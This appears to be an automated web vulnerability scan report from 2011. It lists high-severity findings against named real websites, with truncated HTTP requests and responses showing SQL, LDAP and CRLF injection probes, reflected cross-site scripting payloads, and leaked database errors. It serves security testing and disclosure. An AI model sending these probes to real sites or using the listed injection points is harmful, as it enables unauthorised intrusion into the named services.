GET /a.z?s=143&p=9&c=2&cid Referer: http://www.scout.com/a.z User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.scout.com Cookie: RefId=0; BrandId=0; SessionBrandId=0 Accept-Encoding: gzip, deflate |
HTTP/1.1 200 OK Cache-Control: public, s-maxage=600 Date: Fri, 06 May 2011 20:01:21 GMT Content-Type: text/html; charset=utf-8 Expires: Fri, 06 May 2011 20:11:21 GMT Server: Microsoft-IIS/6.0 Server: Sodo X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-HTTPModule: Scout Media Excalibur v.0.0.0.12737 X-Streamed: from 192.168.20.181 in 151 ms Vary: Accept-Encoding Content-Length: 27936 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html> <head> <title>Scout.com: Zack Williams Profile</title> <meta http ...[SNIP]... <!-- ERROR in function: "DB_Commentary_GET()" - Local date/time : Friday, May 06, 2011 1:01:21 PM - Source : undefined - Message : undefined - message : Unclosed quotation mark after the character string ''. - Number : 0 - Description : undefined - description : Unclosed quotation mark after the character string ''. - URL: s=143&p=9&c=2&cid=1037787 ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.scout.com |
Path: | /a.z |
GET /a.z?s=143&p=9&c=2&cid Referer: http://www.scout.com/a.z User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.scout.com Cookie: RefId=0; BrandId=0; SessionBrandId=0 Accept-Encoding: gzip, deflate |
HTTP/1.1 200 OK Cache-Control: public, s-maxage=600 Date: Fri, 06 May 2011 20:02:21 GMT Content-Type: text/html; charset=utf-8 Expires: Fri, 06 May 2011 20:12:21 GMT Server: Microsoft-IIS/6.0 Server: Summit X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-HTTPModule: Scout Media Excalibur v.0.0.0.12737 X-Streamed: from 192.168.20.181 in 49 ms Vary: Accept-Encoding Content-Length: 13733 <!-- An exception occurred. Described as: Unclosed quotation mark after the character string ',null,null,null,null PUBLIC "-//W3C//DTD XHTML 1.0 Strict//E ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.scout.com |
Path: | /a.z |
POST /a.z?s=143&p=9&c=2&cid Referer: http://www.scout.com/a.z User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form Host: www.scout.com Cookie: RefId=0; BrandId=0; SessionBrandId=0 Accept-Encoding: gzip, deflate Content-Length: 61 __VIEWSTATE=%2fwEPDw |
HTTP/1.1 200 OK Cache-Control: public, s-maxage=600 Date: Fri, 06 May 2011 20:04:04 GMT Content-Type: text/html; charset=utf-8 Expires: Fri, 06 May 2011 20:13:44 GMT Server: Microsoft-IIS/6.0 Server: Scoutweb9 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-HTTPModule: Scout Media Excalibur v.0.0.0.12737 Vary: Accept-Encoding Content-Length: 13442 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html> <head> <title>Scout.com: Zack Williams Profile</title> <meta http ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.socialfollow |
Path: | /button/image/ |
GET /button/image/?b=1' HTTP/1.1 Host: www.socialfollow.com Proxy-Connection: keep-alive Referer: http://www.socialfollow Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=131048717 |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 17:40:55 GMT Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8 X-Powered-By: PHP/5.2.4-2ubuntu5.12 Content-Length: 1288 Content-Type: text/html <br /> <b>Warning</b>: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in <b>/var/www/vhosts <b ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.dominione |
Path: | /main/do/Careers |
GET /main/do/*)(sn=* HTTP/1.1 Host: www.dominionenterprises Proxy-Connection: keep-alive Referer: http://dominionenter User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vnum=1307317138614%26vn |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 19:36:26 GMT X-Powered-By: PHP/4.4.2 Set-Cookie: PHPSESSID=ec8318b7ec Pragma: no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Fri, 06 May 2011 19:36:26 GMT Cache-Control: no-store, must-revalidate Cache-Control: post-check=-1, pre-check=-1 Content-Length: 0 Content-Type: text/html Set-Cookie: TSa27990=3889173c833 |
GET /main/do/*)!(sn=* HTTP/1.1 Host: www.dominionenterprises Proxy-Connection: keep-alive Referer: http://dominionenter User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vnum=1307317138614%26vn |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 19:36:27 GMT Server: Apache/2.0.59 (Unix) DAV/2 PHP/4.4.2 X-Powered-By: PHP/4.4.2 Set-Cookie: PHPSESSID=fbdf302905 Pragma: no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Fri, 06 May 2011 19:36:27 GMT Cache-Control: no-store, must-revalidate Cache-Control: post-check=-1, pre-check=-1 Content-Length: 0 Content-Type: text/html |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.hunton.com |
Path: | /professionals/uniGC.aspx |
GET /professionals/uniGC.aspx Host: www.hunton.com Proxy-Connection: keep-alive Referer: http://www.hunton.com X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 00:13:21 GMT Server: Microsoft-IIS/6.0 x-geoloc: 05 x-client: 000040 x-apptype: 01 x-prodtype: 01 x-public: 1 x-redirect: 0 x-occurrence: 01 x-server: EG-H1WS-A09 X-UA-Compatible: IE=EmulateIE7 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=7483b893-e478 Set-Cookie: DefaultCulture=en-US; path=/ Set-Cookie: Mode=1; path=/ Set-Cookie: EventingStatus=1; path=/ Set-Cookie: NavId=1846; path=/ Set-Cookie: PortletId=5983402; path=/ Set-Cookie: SiteId=1837; path=/ Set-Cookie: SERVER_PORT=80; path=/ Set-Cookie: Localization=TimeZone=0 Set-Cookie: ZoneId=7; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 43380 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <tit ...[SNIP]... zBiM3mkuwdaUcjKasqgc ...[SNIP]... |
GET /professionals/uniGC.aspx Host: www.hunton.com Proxy-Connection: keep-alive Referer: http://www.hunton.com X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 00:13:26 GMT Server: Microsoft-IIS/6.0 x-geoloc: 05 x-client: 000040 x-apptype: 01 x-prodtype: 01 x-public: 1 x-redirect: 0 x-occurrence: 01 x-server: EG-H1WS-A09 X-UA-Compatible: IE=EmulateIE7 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=7483b893-e478 Set-Cookie: DefaultCulture=en-US; path=/ Set-Cookie: Mode=1; path=/ Set-Cookie: EventingStatus=1; path=/ Set-Cookie: NavId=1846; path=/ Set-Cookie: PortletId=5983402; path=/ Set-Cookie: SiteId=1837; path=/ Set-Cookie: SERVER_PORT=80; path=/ Set-Cookie: Localization=TimeZone=0 Set-Cookie: ZoneId=7; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 43390 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <tit ...[SNIP]... zBiM3mkuwdaUcjKasqgc ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/scmag.hmktus/sc |
GET /46fd5%0d%0a3cd3e079b91/scmag.hmktus/sc.other Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.scmagazineus User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __gads=ID=3cde97f19b |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/46fd5 3cd3e079b91/scmag.hmktus/sc.other Date: Fri, 06 May 2011 21:52:20 GMT Server: GFE/2.0 <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://d.xp1.ru4.com |
Path: | /activity |
GET /activity?_o=62795&_t=cm Host: d.xp1.ru4.com Proxy-Connection: keep-alive Referer: http://tags.bluekai.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: X1ID=AM-00000000030620452 |
HTTP/1.1 302 Moved Temporarily Server: Sun-Java-System-Web Date: Fri, 06 May 2011 22:33:42 GMT P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI" Pragma: no-cache Set-cookie: O62795=0; domain=.ru4.com; path=/; expires=Mon, 01-Jan-1970 12:00:00 GMT Location: http://65753 be7cf5083b Content-length: 0 Connection: close |
Severity: | High |
Confidence: | Certain |
Host: | http://learn.bridgefront |
Path: | /sendpassword |
GET /sendpassword?button1=Get Host: learn.bridgefront.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=199010044 |
HTTP/1.1 302 Moved Temporarily Date: Fri, 06 May 2011 23:00:19 GMT Server: Apache/2.2.3 (Red Hat) Set-Cookie: JSESSIONID=7FF0975F9 Location: http://learn.bridgefront c733422f1d&email=3 Content-Length: 0 Connection: close Content-Type: text/plain; charset=UTF-8 |
Severity: | High |
Confidence: | Certain |
Host: | http://adsfac.us |
Path: | /ag.asp |
GET /ag.asp?cc=40985<script>alert(1)< Host: adsfac.us Proxy-Connection: keep-alive Referer: http://www.scmagazineus User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: FSDLK001=pctl=311878&fpt |
HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Content-Length: 293 Content-Type: text/html Expires: Sat, 07 May 2011 01:49:21 GMT Server: Microsoft-IIS/7.0 Set-Cookie: FS40985%3Cscript%3Ealert Set-Cookie: FS40985%3Cscript%3Ealert P3P: CP="NOI DSP COR NID CUR OUR NOR" Date: Sat, 07 May 2011 01:50:20 GMT Connection: close if (typeof(fd_clk) == 'undefined') {var fd_clk = 'http://ADSFAC.US/link ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://apps.sapha.com |
Path: | /appshandler.php |
GET /appshandler.php?ac=1%0096ee3<script>alert(1)< Host: apps.sapha.com Proxy-Connection: keep-alive Referer: http://www.sapha.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sapha_tst_2546=TRUE; sapha_2546_1=62715 |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 22:05:49 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 Vary: Accept-Encoding,User Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 600 </td></tr></table><b ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://apps.sapha.com |
Path: | /appshandler.php |
GET /appshandler.php?ac=2546f84ef<script>alert(1)< Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: apps.sapha.com Cookie: sapha_tst_2546=TRUE |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 22:54:56 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 Vary: Accept-Encoding,User Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 682 </td></tr></table><b ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | https://broker.gotoassist |
Path: | /h/lbmc |
GET /h/lbmc?Portal=lbmc Host: broker.gotoassist.com Connection: keep-alive Referer: http://www.gotoassist.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 01:44:14 GMT Server: Apache Cache-Control: no-cache Pragma: no-cache Set-Cookie: dtsSession=SessionInfo Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 9094 <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>GoToAssist: live online customer support</title> <script language="JavaScript"> <!-- function empty ...[SNIP]... <input type=text size=18 style="font: normal 10 verdana,arial,helvetica ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://cdn-cms.scout.com |
Path: | /feeds/analyticsfeed.ashx |
GET /feeds/analyticsfeed.ashx Host: cdn-cms.scout.com Proxy-Connection: keep-alive Referer: http://www.scout.com/2/a User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UnicaNIODID=Jwu5zEjpq0Q |
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 Server: Static1 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-HTTPModule: Scout Media Excalibur v.0.0.0.12737 Cache-Control: private Content-Type: application/x-javascript; charset=utf-8 Vary: Accept-Encoding Date: Fri, 06 May 2011 19:29:14 GMT Connection: close Akamai: True Content-Length: 347 $.analytics.report301e2<script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://cdn-forums.scout |
Path: | /adfeed.ashx |
GET /adfeed.ashx?s=143&format Host: cdn-forums.scout.com Proxy-Connection: keep-alive Referer: http://www.scout.com/2/a User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UnicaNIODID=Jwu5zEjpq0Q |
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 Server: Mbrd8 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Website-Assembly Cache-Control: private Content-Type: application/x-javascript; charset=utf-8 Vary: Accept-Encoding Date: Fri, 06 May 2011 19:29:15 GMT Connection: close Akamai: True Content-Length: 335 $.showAd.cacheAdCodes10cef<script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://dce.sapha.com |
Path: | /engine.php |
GET /engine.php?ac=-111'%20OR Host: dce.sapha.com Proxy-Connection: keep-alive Referer: http://tours.sapha.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sapha_tst_2546=TRUE; sapha_2546_1=62715 |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 22:05:31 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 Vary: Accept-Encoding,User Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 494 </td></tr></table><b ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://dce.sapha.com |
Path: | /engine.php |
GET /engine.php?ac=-111'%20OR Host: dce.sapha.com Proxy-Connection: keep-alive Referer: http://tours.sapha.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sapha_tst_2546=TRUE; sapha_2546_1=62715 |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 22:05:48 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 Vary: Accept-Encoding,User Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 502 </td></tr></table><b ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://depot.activalive |
Path: | /app/deployment.php |
GET /app/deployment.php?id Host: depot.activalive.com Proxy-Connection: keep-alive Referer: http://www.firehost.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 01:18:34 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.13 Content-Length: 550 Connection: close Content-Type: text/javascript;charset _alc.monitoring.push(5221 _alc.__setStartDeptStatus _alc.__setStartDeptStatus delete _alc.__setStartDeptStatus _alc.setup(10596, 5930); _alc.handleInvite = _alc.rollDownInvite; _alc.handleInviteRej _a ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://dinclinx.com |
Path: | / |
GET /?s=103&e=0&t=21&f Host: dinclinx.com Proxy-Connection: keep-alive Referer: http://www.scmagazineus User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Connection: close Date: Fri, 06 May 2011 21:50:11 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Cache-Control: no-cache, max-age=0, must-revalidate Pragma: no-cache Expires: Fri, 06 May 2011 21:50:11 GMT Content-Type: application/x-javascript; charset=utf-8 Content-Length: 69 // Error: Unknown parameter 79937<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | https://events.gsmiweb |
Path: | /subscribe.php |
GET /subscribe.php?event_id= Host: events.gsmiweb.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=246713051 |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 22:23:29 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=fvqe9k1kjf Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 315 Connection: close Content-Type: text/html <script language="javascript"> window.location.href= </script> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/2b634<script>alert(1)< type = 1 AND active = 1 ' at line 3 |
Severity: | High |
Confidence: | Certain |
Host: | http://image.provide |
Path: | /cmd/advancedaccess |
GET /cmd9ce1e<script>alert(1)< Host: image.providesupport.com Proxy-Connection: keep-alive Referer: http://www.advancedaccess User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: vsid=pNpFk6ofuQKf |
HTTP/1.1 404 Not Found Content-Type: text/html Cache-Control: no-cache Pragma: no-cache Connection: close Date: Fri, 06 May 2011 18:40:14 GMT Content-Length: 545 <html> <body> <h2>Error 404: Not Found</h2> <pre> File: /cmd9ce1e<script>alert(1)< </pre> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://image.provide |
Path: | /js/advancedaccess/safe |
GET /jsce53d<script>alert(1)< Host: image.providesupport.com Proxy-Connection: keep-alive Referer: http://www.advancedaccess User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Content-Type: text/html Cache-Control: no-cache Pragma: no-cache Connection: close Date: Fri, 06 May 2011 18:39:59 GMT Content-Length: 574 <html> <body> <h2>Error 404: Not Found</h2> <pre> File: /jsce53d<script>alert(1)< </pre> <!-- ===================== ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://image.provide |
Path: | /js/advancedaccess/safe |
GET /js/advancedaccess4f0a6<a>a8f8fbe4fcc/safe-monitor.js?ps_h Host: image.providesupport.com Proxy-Connection: keep-alive Referer: http://www.advancedaccess User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Content-Type: text/html Cache-Control: no-cache Pragma: no-cache Connection: close Date: Fri, 06 May 2011 18:40:01 GMT Content-Length: 552 <html> <body> <h2>Error 404: Not Found</h2> <pre> Page: /js/advancedaccess4f0a6<a>a8f8fbe4fcc/safe-monitor.js?ps_h </pre> <!-- ========================= ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://img.mediaplex.com |
Path: | /content/0/16228/124632 |
GET /content/0/16228/124632 Host: img.mediaplex.com Proxy-Connection: keep-alive Referer: http://www.scmagazineus User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: svid=822523287793; __utmz=183366586 |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 01:50:41 GMT Server: Apache Last-Modified: Fri, 11 Mar 2011 22:17:39 GMT ETag: "555379-d9c-49e3c5474a6c0 Accept-Ranges: bytes Content-Length: 4298 Content-Type: application/x-javascript (function(){ var protocol = window.location.protocol; if (protocol == "https:") { protocol = "https://secure.img-cdn } else { protocol = "http://img-cdn.mediaplex }; ...[SNIP]... <mpcke/>'; if (mpcke == 1) { mpcclick = encodeURIComponent( mpck = "http://" + mpcclick; } else if (mpcke == 2) { mpcclick2 = encodeURIComponent( mpck = "h ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://img.mediaplex.com |
Path: | /content/0/16228/124632 |
GET /content/0/16228/124632 Host: img.mediaplex.com Proxy-Connection: keep-alive Referer: http://www.scmagazineus User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: svid=822523287793; __utmz=183366586 |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 01:50:43 GMT Server: Apache Last-Modified: Fri, 11 Mar 2011 22:17:39 GMT ETag: "555379-d9c-49e3c5474a6c0 Accept-Ranges: bytes Content-Length: 4304 Content-Type: application/x-javascript (function(){ var protocol = window.location.protocol; if (protocol == "https:") { protocol = "https://secure.img-cdn } else { protocol = "http://img-cdn.mediaplex }; ...[SNIP]... <a href="http://ad ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://img.mediaplex.com |
Path: | /content/0/16228/124632 |
GET /content/0/16228/124632 Host: img.mediaplex.com Proxy-Connection: keep-alive Referer: http://www.scmagazineus User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: svid=822523287793; __utmz=183366586 |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 01:51:23 GMT Server: Apache Last-Modified: Fri, 11 Mar 2011 22:17:39 GMT ETag: "555379-d9c-49e3c5474a6c0 Accept-Ranges: bytes Content-Length: 4300 Content-Type: application/x-javascript (function(){ var protocol = window.location.protocol; if (protocol == "https:") { protocol = "https://secure.img-cdn } else { protocol = "http://img-cdn.mediaplex }; ...[SNIP]... <a href="http://ad ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://img.mediaplex.com |
Path: | /content/0/16228/124632 |
GET /content/0/16228/124632 Host: img.mediaplex.com Proxy-Connection: keep-alive Referer: http://www.scmagazineus User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: svid=822523287793; __utmz=183366586 |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 01:51:21 GMT Server: Apache Last-Modified: Fri, 11 Mar 2011 22:17:39 GMT ETag: "555379-d9c-49e3c5474a6c0 Accept-Ranges: bytes Content-Length: 4300 Content-Type: application/x-javascript (function(){ var protocol = window.location.protocol; if (protocol == "https:") { protocol = "https://secure.img-cdn } else { protocol = "http://img-cdn.mediaplex }; ...[SNIP]... <mpvce/>'; if (mpvce == 1) { mpvclick = encodeURIComponent("http: mpvc = mpvclick; } else if (mpvce == 2) { mpvclick2 = encodeURIComponent("http: ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://img.mediaplex.com |
Path: | /content/0/16228/124632 |
